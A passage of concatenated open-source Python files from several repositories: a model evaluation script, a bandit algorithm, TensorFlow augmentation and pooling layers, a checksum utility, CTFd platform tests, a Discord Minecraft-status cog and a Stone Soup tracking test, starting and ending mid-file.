l_target = l_target.to(device)
l_lack_labels = l_lack_labels.to(device)
total_len += l_target.shape[-1]
lack_total_len += l_lack_labels.shape[-1]
output = model(l_data)
output = output.view([-1, output.shape[-1]])
targets = l_target.view(-1)
test_loss += F.cross_entropy(output, targets, ignore_index=-1).item()
pred = output.argmax(1)
pred = as_seaquence(pred.detach(), ahead=7)
segmentation_correct += pred.eq(targets.view_as(pred)).sum().item()
model.tatc.select_data_per_labels(l_data, pred, device)
tatc_output = model.tatc()
test_loss += F.cross_entropy(tatc_output, l_lack_labels.reshape(-1)).item()
tatc_pred = tatc_output.argmax(1)
print("true:", l_lack_labels[0])
print("inference:", tatc_pred)
lack_classifier_correct += tatc_pred.eq(l_lack_labels.view_as(tatc_pred)).sum().item()
true_seq_labels += targets.view_as(pred).cpu().tolist()
inf_seq_labels += pred.cpu().tolist()
lack_labels_cpu = l_lack_labels.view_as(tatc_pred).cpu().tolist()
tatc_pred_cpu = tatc_pred.cpu().tolist()
true_finish_labels += lack_labels_cpu
inf_finish_labels += tatc_pred_cpu
inf_finish_proba += tatc_output[:, 1].view(-1).cpu().tolist()
true_finish_labels_mat[i_batch] = lack_labels_cpu
inf_finish_labels_mat[i_batch] = tatc_pred_cpu
test_loss /= len(data_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Seg Accuracy: {}/{} ({:.0f}%), lack Accuracy: {}/{} ({:.0f}%)\n'
.format(test_loss,
segmentation_correct, total_len, 100. * segmentation_correct / total_len,
lack_classifier_correct, lack_total_len, 100. * lack_classifier_correct / lack_total_len))
print("seq f1:")
print(precision_recall_fscore_support(true_seq_labels, inf_seq_labels))
print("finish work:")
print(precision_recall_fscore_support(true_finish_labels, inf_finish_labels))
fpr, tpr, _ = roc_curve(true_finish_labels, inf_finish_proba)
plt.plot(fpr, tpr)
plt.savefig( Path(args.out_dir, 'finish_roc.png') )
print("finish work AUC:")
print(auc(fpr, tpr))
for i in range(args.n_class -1):
print("class {}:".format(i))
print(precision_recall_fscore_support(true_finish_labels_mat[:, i], inf_finish_labels_mat[:, i]))
print("低速:")
print(precision_recall_fscore_support(true_finish_labels_mat[:5, :].ravel(), inf_finish_labels_mat[:5, :].ravel()))
print("中速:")
print(precision_recall_fscore_support(true_finish_labels_mat[5:10, :].ravel(), inf_finish_labels_mat[5:10, :].ravel()))
print("高速:")
print(precision_recall_fscore_support(true_finish_labels_mat[10:15, :].ravel(), inf_finish_labels_mat[10:15, :].ravel()))
for i in range(5):
start = 15+i*3
end = 15+(i+1)*3
print("作業{}中断再開:".format(i+1))
print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel()))
for i in range(5):
start = 30+i*3
end = 30+(i+1)*3
print("作業{}中断:".format(i+1))
print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel()))
for i in range(5):
start = 45+i*3
end = 45+(i+1)*3
print("作業{}欠損:".format(i+1))
print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel()))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--root_dir', default='/home/sh70k/mnt/tracker_data/test', help='path to dataset')
parser.add_argument('--n-class', type=int, default=6, help='number of class')
parser.add_argument('--test_seq-len', type=int, default=200, help='fixed seaquence length')
parser.add_argument('--time-step', type=float, default=.25, help='fixed time interbal of input data')
parser.add_argument('--test-data-file-pointer-path', default='./data/test_data_file_pointer', help='path to test data file pointer')
parser.add_argument('--resume-model', default='/home/sh70k/mnt/tracker_data/results/model_ckpt_v1_average.pth', help='path to trained model')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--batch-size', type=int, default=1, help='input batch size')
parser.add_argument('--out-dir', default='/home/sh70k/mnt/tracker_data/results', help='folder to output data and model checkpoints')
args = parser.parse_args()
Path(args.out_dir).mkdir(parents=True, exist_ok=True),
main(args)
``` |
{
"source": "0shimax/SW-TS",
"score": 3
} |
#### File: SW-TS/src/DLinTS.py
```python
import numpy as np
from math import log
from numpy.linalg import pinv
# from numpy import linalg as LA
# from scipy.stats import truncnorm
import scipy
from dataclasses import dataclass
# from arm import ArmGaussian
@dataclass
class DLinTS(object):
"""
Implementation of the class for the Discounted Follow-The-Gaussian-Perturbed-Leader
param:
- d: dimension of the action vectors (feature dimension)
- delta: probability of theta in the confidence bound
- alpha: tuning the exploration parameter
- lambda_: regularization parameter
- s: constant such that L2 norm of theta smaller than s
- gamma: discount parameter
- name: additional suffix when comparing several policies (optional)
- sm: Should Sherman-Morisson formula be used for inverting matrices ?
- sigma_noise: square root of the variance of the noise
- verbose: To print information
- omniscient: Does the policy knows when the breakpoints happen ?
ACTION NORMS ARE SUPPOSED TO BE BOUNDED BE 1
"""
dim: int
delta: float
alpha: float
lambda_: float
# s: float
# l: float
gamma: float
sigma_noise: float
verbose: bool # = True
# S-M cannot be used with this model for the moment
sm: bool # = False
# omniscient: bool # = False
t: int = None
gamma2_t: float = None
def __post_init__(self):
''' build attributes '''
# first term in square root
self.c_delta = 2 * log(1 / self.delta)
''' attributes for the re-init '''
# model parameter
self.hat_theta = np.zeros(self.dim)
# Design Matrix
self.cov = self.lambda_ * np.identity(self.dim)
# Design Square Matrix
self.cov_squared = self.lambda_ * np.identity(self.dim)
self.invcov = 1 / self.lambda_ * np.identity(self.dim)
self.b = np.zeros(self.dim)
self.t = 0
self.gamma2_t = 1.0
def update_state(self, features:np.ndarray, reward:float):
"""
Updating the main parameters for the model
param:
- features: Feature used for updating
- reward: Reward used for updating
Output:
-------
Nothing, but the class instances are updated
"""
assert isinstance(features, np.ndarray), 'np.array required'
aat = np.outer(features, features.T)
self.gamma2_t *= self.gamma ** 2
self.cov = self.gamma * self.cov + aat + (1-self.gamma) * self.lambda_ * np.identity(self.dim)
self.cov_squared = self.gamma ** 2 * self.cov_squared + aat + (1 - self.gamma ** 2) * self.lambda_ * np.identity(self.dim)
self.b = self.gamma * self.b + reward * features
# const1 = np.sqrt(self.lambda_) * self.s
# beta_t = const1 + self.sigma_noise *\
# np.sqrt(self.c_delta + self.dim * np.log(1 + self.l**2 *(1-self.gamma2_t)/(self.dim * self.lambda_*(1 - self.gamma**2))))
self.gamma2_t *= self.gamma ** 2
if not self.sm:
self.invcov = pinv(self.cov)
else:
raise NotImplementedError("Method SM is not implemented for D-LinTS")
z = np.random.multivariate_normal(np.zeros(self.dim), np.eye(self.dim))
self.hat_theta = np.inner(self.invcov, self.b + self.alpha * np.dot(scipy.linalg.sqrtm(self.cov_squared).real, z))
if self.verbose:
print('AAt:', aat)
print('Policy was updated at time t= ' + str(self.t))
print('Reward received =', reward)
self.t += 1
def calculate_win_rate(self, features:np.ndarray):
assert isinstance(features, np.ndarray), 'np.array required'
return features.dot(self.hat_theta)[0][0]
def __str__(self):
return 'D-LinTS'
@staticmethod
def id():
return 'D-LinTS'
``` |
{
"source": "0shimax/tensorflow-layers-examples",
"score": 3
} |
#### File: scripts/data_loader/augmentation.py
```python
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import array_ops
import random
from random import randint
rand_seed = 555
random.seed(555)
scaling_factor = [0.5, 0.625, 0.75, 0.875, 1, 1.125, 1.25, 1.375, 1.5]
shift_factor = [0 , 16, 32, 48, 64]
def augment(image, multiple):
xh, xw, xch = image.get_shape().as_list()
# Randomly flip the image horizontally.
image = tf.image.random_flip_left_right(image, seed=rand_seed)
image = tf.image.random_flip_up_down(image, seed=rand_seed)
image = tf.image.random_contrast(image, lower=0.2, upper=1.8, seed=rand_seed)
image = tf.image.random_brightness(image, max_delta=63, seed=rand_seed)
# k = randint(0, 3)
# # rot90 has bug. now skip rot.
# # rot90 is not affine transformation.
# image = rot90(image, k=k)
# # offset image
# image = shift(image, h, w)
# image = scaling(image, multiple, h, w, ch)
# h, w, ch = image.get_shape().as_list()
# print(h, w, ch)
return image
def scaling(image, multiple, h, w, ch):
# h, w, ch = image.get_shape().as_list()
scale = randint(0, len(scaling_factor)-1)
new_sz = [int(h*scale)+1, int(w*scale)+1]
# scaling
image = tf.image.resize_images(image, new_sz)
xh, xw, ch = image.get_shape().as_list()
m0, m1 = xh % multiple, xw % multiple
d0, d1 = randint(0, m0), randint(0, m1)
image = tf.random_crop(image, [xh-m0, xw-m1, ch], seed=rand_seed)
return image
def shift(image, h, w):
x_shift_idx = randint(0, len(shift_factor)-1)
y_shift_idx = randint(0, len(shift_factor)-1)
x_shift = shift_factor[x_shift_idx]
y_shift = shift_factor[y_shift_idx]
print(x_shift, y_shift, h, w)
image = tf.image.pad_to_bounding_box(image, x_shift, y_shift, h-x_shift, w-y_shift)
return image
def rot90(image, k=1, name=None):
"""Rotate an image counter-clockwise by 90 degrees.
Args:
image: A 3-D tensor of shape `[height, width, channels]`.
k: A scalar integer. The number of times the image is rotated by 90 degrees.
name: A name for this operation (optional).
Returns:
A rotated 3-D tensor of the same type and shape as `image`.
"""
with ops.name_scope(name, 'rot90', [image, k]) as scope:
image = ops.convert_to_tensor(image, name='image')
_Check3DImage(image, require_static=False)
k = ops.convert_to_tensor(k, dtype=dtypes.int32, name='k')
k.get_shape().assert_has_rank(0)
k = math_ops.mod(k, 4)
def _rot90():
return array_ops.transpose(array_ops.reverse_v2(image, [1]),
[1, 0, 2])
def _rot180():
return array_ops.reverse_v2(image, [0, 1])
def _rot270():
return array_ops.reverse_v2(array_ops.transpose(image, [1, 0, 2]),
[1])
cases = [(math_ops.equal(k, 1), _rot90),
(math_ops.equal(k, 2), _rot180),
(math_ops.equal(k, 3), _rot270)]
ret = control_flow_ops.case(cases, default=lambda: image, exclusive=True,
name=scope)
h, w, ch = image.get_shape().as_list()
if k==1 or k==3:
shape = [w, h]
else:
shape = [h, w]
ret.set_shape(shape+[ch])
return ret
def _Check3DImage(image, require_static=True):
"""Assert that we are working with properly shaped image.
Args:
image: 3-D Tensor of shape [height, width, channels]
require_static: If `True`, requires that all dimensions of `image` are
known and non-zero.
Raises:
ValueError: if `image.shape` is not a 3-vector.
Returns:
An empty list, if `image` has fully defined dimensions. Otherwise, a list
containing an assert op is returned.
"""
try:
image_shape = image.get_shape().with_rank(3)
except ValueError:
raise ValueError("'image' (shape %s) must be three-dimensional." %
image.shape)
if require_static and not image_shape.is_fully_defined():
raise ValueError("'image' (shape %s) must be fully defined." %
image_shape)
if any(x == 0 for x in image_shape):
raise ValueError("all dims of 'image.shape' must be > 0: %s" %
image_shape)
if not image_shape.is_fully_defined():
return [check_ops.assert_positive(array_ops.shape(image),
["all dims of 'image.shape' "
"must be > 0."])]
else:
return []
from skimage.transform import rotate
from skimage.transform import warp
from skimage.transform import ProjectiveTransform
def rotate(X, intensity):
for i in range(X.shape[0]):
delta = 30. * intensity # scale using augmentation intensity
X[i] = rotate(X[i], random.uniform(-delta, delta), mode = 'edge')
return X
def apply_projection_transform(X, intensity):
image_size = X.shape[1]
d = image_size * 0.3 * intensity
for i in range(X.shape[0]):
tl_top = random.uniform(-d, d) # Top left corner, top margin
tl_left = random.uniform(-d, d) # Top left corner, left margin
bl_bottom = random.uniform(-d, d) # Bottom left corner, bottom margin
bl_left = random.uniform(-d, d) # Bottom left corner, left margin
tr_top = random.uniform(-d, d) # Top right corner, top margin
tr_right = random.uniform(-d, d) # Top right corner, right margin
br_bottom = random.uniform(-d, d) # Bottom right corner, bottom margin
br_right = random.uniform(-d, d) # Bottom right corner, right margin
transform = ProjectiveTransform()
transform.estimate(np.array((
(tl_left, tl_top),
(bl_left, image_size - bl_bottom),
(image_size - br_right, image_size - br_bottom),
(image_size - tr_right, tr_top)
)), np.array((
(0, 0),
(0, image_size),
(image_size, image_size),
(image_size, 0)
)))
X[i] = warp(X[i], transform, output_shape=(image_size, image_size), order = 1, mode = 'edge')
return X
```
#### File: scripts/functions/spp.py
```python
import tensorflow as tf
import numpy as np
def max_pool_2d_nxn_regions(inputs, output_size: int, mode: str):
"""
Performs a pooling operation that results in a fixed size:
output_size x output_size.
Used by spatial_pyramid_pool. Refer to appendix A in [1].
Args:
inputs: A 4D Tensor (B, H, W, C)
output_size: The output size of the pooling operation.
mode: The pooling mode {max, avg}
Returns:
A list of tensors, for each output bin.
The list contains output_size * output_size elements, where
each elment is a Tensor (N, C).
References:
[1] <NAME> et al (2015):
Spatial Pyramid Pooling in Deep Convolutional Networks
for Visual Recognition.
https://arxiv.org/pdf/1406.4729.pdf.
Ported from: https://github.com/luizgh/Lasagne/commit/c01e3d922a5712ca4c54617a15a794c23746ac8c
"""
inputs_shape = tf.shape(inputs)
h = tf.cast(tf.gather(inputs_shape, 1), tf.int32)
w = tf.cast(tf.gather(inputs_shape, 2), tf.int32)
if mode == 'max':
pooling_op = tf.reduce_max
elif mode == 'avg':
pooling_op = tf.reduce_mean
else:
msg = "Mode must be either 'max' or 'avg'. Got '{0}'"
raise ValueError(msg.format(mode))
result = []
n = output_size
for row in range(output_size):
for col in range(output_size):
# start_h = floor(row / n * h)
start_h = tf.cast(tf.floor(tf.multiply(tf.divide(row, n), tf.cast(h, tf.float32))), tf.int32)
# end_h = ceil((row + 1) / n * h)
end_h = tf.cast(tf.ceil(tf.multiply(tf.divide((row + 1), n), tf.cast(h, tf.float32))), tf.int32)
# start_w = floor(col / n * w)
start_w = tf.cast(tf.floor(tf.multiply(tf.divide(col, n), tf.cast(w, tf.float32))), tf.int32)
# end_w = ceil((col + 1) / n * w)
end_w = tf.cast(tf.ceil(tf.multiply(tf.divide((col + 1), n), tf.cast(w, tf.float32))), tf.int32)
pooling_region = inputs[:, start_h:end_h, start_w:end_w, :]
pool_result = pooling_op(pooling_region, axis=(1, 2))
result.append(pool_result)
return result
def spatial_pyramid_pool(inputs, dimensions=[2,1], mode='max', implementation='kaiming'):
"""
Performs spatial pyramid pooling (SPP) over the input.
It will turn a 2D input of arbitrary size into an output of fixed
dimenson.
Hence, the convlutional part of a DNN can be connected to a dense part
with a fixed number of nodes even if the dimensions of the input
image are unknown.
The pooling is performed over :math:`l` pooling levels.
Each pooling level :math:`i` will create :math:`M_i` output features.
:math:`M_i` is given by :math:`n_i * n_i`, with :math:`n_i` as the number
of pooling operations per dimension level :math:`i`.
The length of the parameter dimensions is the level of the spatial pyramid.
Args:
inputs: A 4D Tensor (B, H, W, C).
dimensions: The list of :math:`n_i`'s that define the output dimension
of each pooling level :math:`i`. The length of dimensions is the level of
the spatial pyramid.
mode: Pooling mode 'max' or 'avg'.
implementation: The implementation to use, either 'kaiming' or 'fast'.
kamming is the original implementation from the paper, and supports variable
sizes of input vectors, which fast does not support.
Returns:
A fixed length vector representing the inputs.
Notes:
SPP should be inserted between the convolutional part of a DNN and it's
dense part. Convolutions can be used for arbitrary input dimensions, but
the size of their output will depend on their input dimensions.
Connecting the output of the convolutional to the dense part then
usually demands us to fix the dimensons of the network's input.
The spatial pyramid pooling layer, however, allows us to leave
the network input dimensions arbitrary.
The advantage over a global pooling layer is the added robustness
against object deformations due to the pooling on different scales.
References:
[1] <NAME> et al (2015):
Spatial Pyramid Pooling in Deep Convolutional Networks
for Visual Recognition.
https://arxiv.org/pdf/1406.4729.pdf.
Ported from: https://github.com/luizgh/Lasagne/commit/c01e3d922a5712ca4c54617a15a794c23746ac8c
"""
pool_list = []
if implementation == 'kaiming':
for pool_dim in dimensions:
pool_list += max_pool_2d_nxn_regions(inputs, pool_dim, mode)
else:
shape = inputs.get_shape().as_list()
for d in dimensions:
h = shape[1]
w = shape[2]
ph = np.ceil(h * 1.0 / d).astype(np.int32)
pw = np.ceil(w * 1.0 / d).astype(np.int32)
sh = np.floor(h * 1.0 / d + 1).astype(np.int32)
sw = np.floor(w * 1.0 / d + 1).astype(np.int32)
pool_result = tf.nn.max_pool(inputs,
ksize=[1, ph, pw, 1],
strides=[1, sh, sw, 1],
padding='SAME')
pool_list.append(tf.reshape(pool_result, [tf.shape(inputs)[0], -1]))
return tf.concat(pool_list, 0)
```
#### File: tensorflow-layers-examples/scripts/train_squeezenet.py
```python
import sys, os
sys.path.append("./scripts/data_loader")
sys.path.append("./models")
from mnist_loader import load_data
from squeeze_net import squeeze_net
from preprocessor_example import mnist_batch_input_fn, minibatch_loader
import functools
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.estimators import model_fn as model_fn_lib
tf.logging.set_verbosity(tf.logging.INFO)
n_class = 10
# define model
def model_fn(features, labels, mode):
# you need to convert labels to one_hot for accuracy metrics.
# (input of accuracy metrics must be vector of scala labels.)
labels = tf.one_hot(labels, depth=n_class)
predictions, loss, train_op = squeeze_net(features, labels, mode, n_class)
# return
return model_fn_lib.ModelFnOps(
mode=mode, predictions=predictions, loss=loss, train_op=train_op)
def main(unused_argv):
# train_data, train_labels, eval_data, eval_labels = load_data("./data/mnist")
mnist = load_data("./data/mnist")
# create Estimator
run_config = tf.contrib.learn.RunConfig(save_summary_steps=10)
classifier = tf.contrib.learn.Estimator(
model_fn=model_fn, model_dir="./results/models/squeeze_net", config=run_config)
# setting log
tensors_to_log = {"probabilities": "softmax_tensor", "classes": "argmax_tensor"}
logging_hook = tf.train.LoggingTensorHook(
tensors=tensors_to_log, every_n_iter=50)
img_pointer_name = 'image_pointer'
label_file_name = 'labels'
data_root = './data'
img_pointer_path = os.path.join(data_root, img_pointer_name)
label_file_path = os.path.join(data_root, label_file_name)
# learning
classifier.fit(
# input_fn=lambda: mnist_batch_input_fn(mnist[:2]),
input_fn=lambda: minibatch_loader( \
img_pointer_path, label_file_path, data_root, \
n_class=10, batch_size=100, num_epochs=10),
monitors=[logging_hook]
)
metrics = {
"accuracy":
tf.contrib.learn.MetricSpec(
metric_fn=tf.metrics.accuracy, prediction_key="classes",
)
}
# evaluate
eval_results = classifier.evaluate(
# input_fn=lambda: mnist_batch_input_fn(mnist[2:]),
input_fn=lambda: minibatch_loader( \
img_pointer_path, label_file_path, data_root, \
n_class=10, batch_size=1, num_epochs=1),
metrics=metrics
)
print(eval_results)
if __name__ == "__main__":
tf.app.run()
``` |
{
"source": "0sifr/comparachecksum",
"score": 3
} |
#### File: comparachecksum/codebase/sha256.py
```python
import hashlib
import sys
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
def main():
for f in sys.argv[1:]:
checksum = sha256_checksum(f)
print(f + '\t' + checksum)
if __name__ == '__main__':
main()
``` |
{
"source": "0skAr-alws/CTFd",
"score": 2
} |
#### File: tests/teams/test_hints.py
```python
from CTFd.utils.scores import get_standings
from tests.helpers import (
create_ctfd,
destroy_ctfd,
gen_award,
gen_challenge,
gen_hint,
gen_team,
gen_user,
login_as_user,
)
def test_hint_team_unlock():
"""Is a user's unlocked hint reflected on other team members"""
app = create_ctfd(user_mode="teams")
with app.app_context():
user = gen_user(app.db)
second_user = gen_user(app.db, name="user", email="<EMAIL>")
team = gen_team(app.db)
user.team_id = team.id
second_user.team_id = team.id
team.members.append(user)
team.members.append(second_user)
chal = gen_challenge(app.db)
gen_hint(app.db, chal.id, content="hint", cost=1, type="standard")
# Give the points to the user that doesn't unlock
# Users that unlock hints should be able to unlock but cost their team points
gen_award(app.db, user_id=3, team_id=team.id)
app.db.session.commit()
with login_as_user(app, name="user_name") as client:
# Assert that we don't see a hint
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
# Unlock the hint
client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
# Assert that we see a hint
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content")
with login_as_user(app) as second_client:
# Assert that we see a hint
r = second_client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content")
# Assert that we can't double unlock
r = second_client.post(
"/api/v1/unlocks", json={"target": 1, "type": "hints"}
)
assert r.status_code == 400
assert (
r.get_json()["errors"]["target"]
== "You've already unlocked this this target"
)
# Assert that we see a hint
r = second_client.get("/api/v1/hints/1")
assert r.json["data"]["content"] == "hint"
# Verify standings
# We start with 100 points from the award.
# We lose a point because we unlock successfully once
standings = get_standings()
assert standings[0][2] == "team_name"
assert standings[0][3] == 99
destroy_ctfd(app)
def test_hint_team_unlocking_without_points():
"""Test that teams cannot enter negative point valuations from unlocking hints"""
app = create_ctfd(user_mode="teams")
with app.app_context():
user = gen_user(app.db)
second_user = gen_user(app.db, name="user", email="<EMAIL>")
team = gen_team(app.db)
user.team_id = team.id
second_user.team_id = team.id
team.members.append(user)
team.members.append(second_user)
chal = gen_challenge(app.db)
gen_hint(app.db, chal.id, content="hint", cost=1, type="standard")
app.db.session.commit()
with login_as_user(app, name="user_name") as client:
# Assert that we don't see a hint
r = client.get("/api/v1/hints/1")
assert r.get_json()["data"].get("content") is None
# Attempt to unlock the hint
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 400
assert (
r.get_json()["errors"]["score"]
== "You do not have enough points to unlock this hint"
)
destroy_ctfd(app)
def test_teams_dont_prevent_other_teams_from_unlocking_hints():
"""Unlocks from one user don't affect other users"""
app = create_ctfd(user_mode="teams")
with app.app_context():
chal = gen_challenge(app.db)
gen_hint(app.db, chal.id, content="This is a hint", cost=1, type="standard")
team1 = gen_team(app.db, name="team1", email="<EMAIL>")
team2 = gen_team(app.db, name="team2", email="<EMAIL>")
# Give users points with an award
gen_award(app.db, user_id=team1.captain_id)
gen_award(app.db, user_id=team2.captain_id)
captain1 = team1.captain.name
captain2 = team2.captain.name
app.db.session.commit()
# First team unlocks hint
with login_as_user(app, name=captain1) as client:
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 200
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
# Second team unlocks hint
with login_as_user(app, name=captain2) as client:
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
r = client.post("/api/v1/unlocks", json={"target": 1, "type": "hints"})
assert r.status_code == 200
r = client.get("/api/v1/hints/1")
assert r.status_code == 200
destroy_ctfd(app)
```
#### File: tests/users/test_fields.py
```python
from CTFd.models import UserFieldEntries
from tests.helpers import (
create_ctfd,
destroy_ctfd,
gen_field,
login_as_user,
register_user,
)
def test_new_fields_show_on_pages():
app = create_ctfd()
with app.app_context():
register_user(app)
gen_field(app.db)
with app.test_client() as client:
r = client.get("/register")
assert "CustomField" in r.get_data(as_text=True)
assert "CustomFieldDescription" in r.get_data(as_text=True)
with login_as_user(app) as client:
r = client.get("/settings")
assert "CustomField" in r.get_data(as_text=True)
assert "CustomFieldDescription" in r.get_data(as_text=True)
r = client.patch(
"/api/v1/users/me",
json={"fields": [{"field_id": 1, "value": "CustomFieldEntry"}]},
)
resp = r.get_json()
assert resp["success"] is True
assert resp["data"]["fields"][0]["value"] == "CustomFieldEntry"
assert resp["data"]["fields"][0]["description"] == "CustomFieldDescription"
assert resp["data"]["fields"][0]["name"] == "CustomField"
assert resp["data"]["fields"][0]["field_id"] == 1
r = client.get("/user")
resp = r.get_data(as_text=True)
assert "CustomField" in resp
assert "CustomFieldEntry" in resp
r = client.get("/users/2")
resp = r.get_data(as_text=True)
assert "CustomField" in resp
assert "CustomFieldEntry" in resp
destroy_ctfd(app)
def test_fields_required_on_register():
app = create_ctfd()
with app.app_context():
gen_field(app.db)
with app.app_context():
with app.test_client() as client:
client.get("/register")
with client.session_transaction() as sess:
data = {
"name": "user",
"email": "<EMAIL>",
"password": "password",
"nonce": sess.get("nonce"),
}
client.post("/register", data=data)
with client.session_transaction() as sess:
assert sess.get("id") is None
with client.session_transaction() as sess:
data = {
"name": "user",
"email": "<EMAIL>",
"password": "password",
"fields[1]": "custom_field_value",
"nonce": sess.get("nonce"),
}
client.post("/register", data=data)
with client.session_transaction() as sess:
assert sess["id"]
destroy_ctfd(app)
def test_fields_properties():
app = create_ctfd()
with app.app_context():
register_user(app)
gen_field(
app.db, name="CustomField1", required=True, public=True, editable=True
)
gen_field(
app.db, name="CustomField2", required=False, public=True, editable=True
)
gen_field(
app.db, name="CustomField3", required=False, public=False, editable=True
)
gen_field(
app.db, name="CustomField4", required=False, public=False, editable=False
)
with app.test_client() as client:
r = client.get("/register")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" in resp
assert "CustomField4" in resp
with login_as_user(app) as client:
r = client.get("/settings")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" in resp
assert "CustomField4" not in resp
r = client.patch(
"/api/v1/users/me",
json={
"fields": [
{"field_id": 1, "value": "CustomFieldEntry1"},
{"field_id": 2, "value": "CustomFieldEntry2"},
{"field_id": 3, "value": "CustomFieldEntry3"},
{"field_id": 4, "value": "CustomFieldEntry4"},
]
},
)
resp = r.get_json()
assert resp == {
"success": False,
"errors": {"fields": ["Field 'CustomField4' cannot be editted"]},
}
r = client.patch(
"/api/v1/users/me",
json={
"fields": [
{"field_id": 1, "value": "CustomFieldEntry1"},
{"field_id": 2, "value": "CustomFieldEntry2"},
{"field_id": 3, "value": "CustomFieldEntry3"},
]
},
)
assert r.status_code == 200
r = client.get("/user")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" not in resp
assert "CustomField4" not in resp
r = client.get("/users/2")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "CustomField2" in resp
assert "CustomField3" not in resp
assert "CustomField4" not in resp
destroy_ctfd(app)
def test_boolean_checkbox_field():
app = create_ctfd()
with app.app_context():
gen_field(app.db, name="CustomField1", field_type="boolean", required=False)
with app.test_client() as client:
r = client.get("/register")
resp = r.get_data(as_text=True)
# We should have rendered a checkbox input
assert "checkbox" in resp
with client.session_transaction() as sess:
data = {
"name": "user",
"email": "<EMAIL>",
"password": "password",
"nonce": sess.get("nonce"),
"fields[1]": "y",
}
client.post("/register", data=data)
with client.session_transaction() as sess:
assert sess["id"]
assert UserFieldEntries.query.count() == 1
assert UserFieldEntries.query.filter_by(id=1).first().value is True
with login_as_user(app) as client:
r = client.get("/settings")
resp = r.get_data(as_text=True)
assert "CustomField1" in resp
assert "checkbox" in resp
r = client.patch(
"/api/v1/users/me", json={"fields": [{"field_id": 1, "value": False}]}
)
assert r.status_code == 200
assert UserFieldEntries.query.count() == 1
assert UserFieldEntries.query.filter_by(id=1).first().value is False
destroy_ctfd(app)
``` |
{
"source": "0skis/bot",
"score": 3
} |
#### File: bot/cogs/minecraft.py
```python
from discord.ext import commands
from mcstatus import MinecraftServer
class Minecraft(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.command(name='minecraft', aliases=['ping'], help='Se om nån server är uppe och om nån fellow gamer är online')
async def _minecraft(self, ctx, *, msg: str):
for ip in msg.split():
if ':' in ip:
address = ip
else:
address = f'{ip}:25565'
try:
server = MinecraftServer.lookup(address)
status = server.status()
await ctx.send(f'{address} has {status.players.online} players and replied in {status.latency} ms')
except:
await ctx.send(f'{address} is offline')
def setup(bot):
bot.add_cog(Minecraft(bot))
``` |
{
"source": "0sm1um/Stone-Soup",
"score": 2
} |
#### File: hypothesiser/tests/test_composite.py
```python
import datetime
import numpy as np
import pytest
from ..categorical import HMMHypothesiser
from ..composite import CompositeHypothesiser
from ..probability import PDAHypothesiser
from ...models.measurement.categorical import MarkovianMeasurementModel
from ...predictor.composite import CompositePredictor
from ...types.detection import Detection, MissedDetection, CompositeDetection, CategoricalDetection
from ...types.hypothesis import CompositeHypothesis, CompositeProbabilityHypothesis
from ...types.multihypothesis import MultipleHypothesis
from ...types.state import GaussianState, CompositeState, CategoricalState
from ...types.track import Track
def make_categorical_measurement_model(ndim_state, ndim_meas):
E = np.random.rand(ndim_state, ndim_meas)
model = MarkovianMeasurementModel(emission_matrix=E)
return model
def test_composite(predictor, updater, dummy_category_predictor, dummy_category_updater):
sub_hypothesisers = [
PDAHypothesiser(predictor, updater, clutter_spatial_density=1.2e-2, prob_detect=0.9,
prob_gate=0.99),
HMMHypothesiser(dummy_category_predictor, dummy_category_updater,
prob_detect=0.7, prob_gate=0.95),
PDAHypothesiser(predictor, updater, clutter_spatial_density=1.4e-2, prob_detect=0.5,
prob_gate=0.98),
HMMHypothesiser(dummy_category_predictor, dummy_category_updater,
prob_detect=0.8, prob_gate=0.97)
]
# Test instantiation errors
with pytest.raises(ValueError, match="Cannot create an empty composite hypothesiser"):
CompositeHypothesiser(sub_hypothesisers=list())
with pytest.raises(ValueError, match="All sub-hypothesisers must be a hypothesiser type"):
CompositeHypothesiser(sub_hypothesisers + [1, 2, 3])
hypothesiser = CompositeHypothesiser(sub_hypothesisers=sub_hypothesisers)
# Test composite predictor and updater
expected_predictors = [sub_hyp.predictor for sub_hyp in sub_hypothesisers]
assert isinstance(hypothesiser.predictor, CompositePredictor)
assert hypothesiser.predictor.sub_predictors == expected_predictors
then = datetime.datetime.now()
now = then + datetime.timedelta(seconds=5)
track = Track([CompositeState([GaussianState([0, 1, 0, 1], 0.1 * np.eye(4)),
CategoricalState([0.2, 0.2, 0.2, 0.2, 0.2]),
GaussianState([3, 4, 5], 0.2 * np.eye(3)),
CategoricalState([0.3, 0.4, 0.3])],
default_timestamp=then)])
detection1 = CompositeDetection([Detection([3, 3, 3, 3], timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now),
Detection([2, 4, 6], timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now)],
mapping=[0, 1, 2, 3])
detection2 = CompositeDetection([Detection([4, 4, 4, 4], timestamp=now),
CategoricalDetection(np.random.rand(2), timestamp=now),
